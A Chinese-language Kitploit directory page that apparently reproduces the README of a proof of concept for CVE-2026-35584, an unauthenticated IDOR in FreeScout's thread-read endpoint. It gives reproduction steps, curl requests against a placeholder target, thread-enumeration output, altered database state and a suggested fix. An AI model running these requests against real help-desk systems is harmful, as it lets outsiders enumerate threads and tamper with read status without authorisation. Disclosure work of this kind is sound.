Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-35584 — 针对 FreeScout 中一个未经验证的 IDOR 漏洞的概念验证利用,该漏洞允许通过精心构造的 HTTP 请求枚举线程并操纵已读状态。 | Kitploit
工具/GitHubGitHub/spoo1k/cve-2026-35584
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubspoo1k/cve-2026-35584

CVE-2026-35584

针对 FreeScout 中一个未经验证的 IDOR 漏洞的概念验证利用,该漏洞允许通过精心构造的 HTTP 请求枚举线程并操纵已读状态。

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-35584

POC - CVE-2026-35584 FreeScout

描述

摘要

端点 GET /thread/read/{conversation_id}/{thread_id} 不需要身份验证,并且不验证给定的 thread_id 是否属于给定的 conversation_id。这允许任何未经身份验证的攻击者:

通过传递任意 ID 将任何线程标记为已读 通过 HTTP 响应代码(200 与 404)枚举有效的线程 ID 跨会话操纵 opened_at 时间戳(IDOR)

root@kitploit:~
受影响版本
1.8.211(最新版)

复现步骤

创建两个会话(conv_id=1 和 conv_id=2) 在会话 2 中创建一个线程(thread_id=3) 在没有任何身份验证的情况下,发送:GET /thread/read/1/3 在数据库中验证 — thread_id=3 的 opened_at 现在已被设置,尽管是通过错误的 conversation_id 访问的

PoC

root@kitploit:~
curl -v "http://TARGET/thread/read/1/3"

返回 HTTP 200 并在线程 3 上设置 opened_at

影响

无需身份验证 IDOR:thread_id 未针对 conversation_id 进行验证 线程枚举:HTTP 200 = 有效线程,404 = 无效 操纵支持代理使用的已读/未读指标 破坏会话隔离模型

建议修复

root@kitploit:~
if ($thread->conversation_id !== (int)$conversation_id) {
abort(403);
}

PoC 输出

线程枚举(未经身份验证)

root@kitploit:~
curl -v "http://TARGET/thread/read/1/1" → HTTP 200(有效线程)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/2" → HTTP 200(有效线程)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/3" → HTTP 200(IDOR - 线程属于会话 2)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/4" → HTTP 404(无效线程)

利用后的数据库状态

之前: | id | conversation_id | opened_at | | 3 | 2 | NULL |

执行 GET /thread/read/1/3(无身份验证)之后: | id | conversation_id | opened_at | | 3 | 2 | 2026-04-03 23:19:46 |

下载工具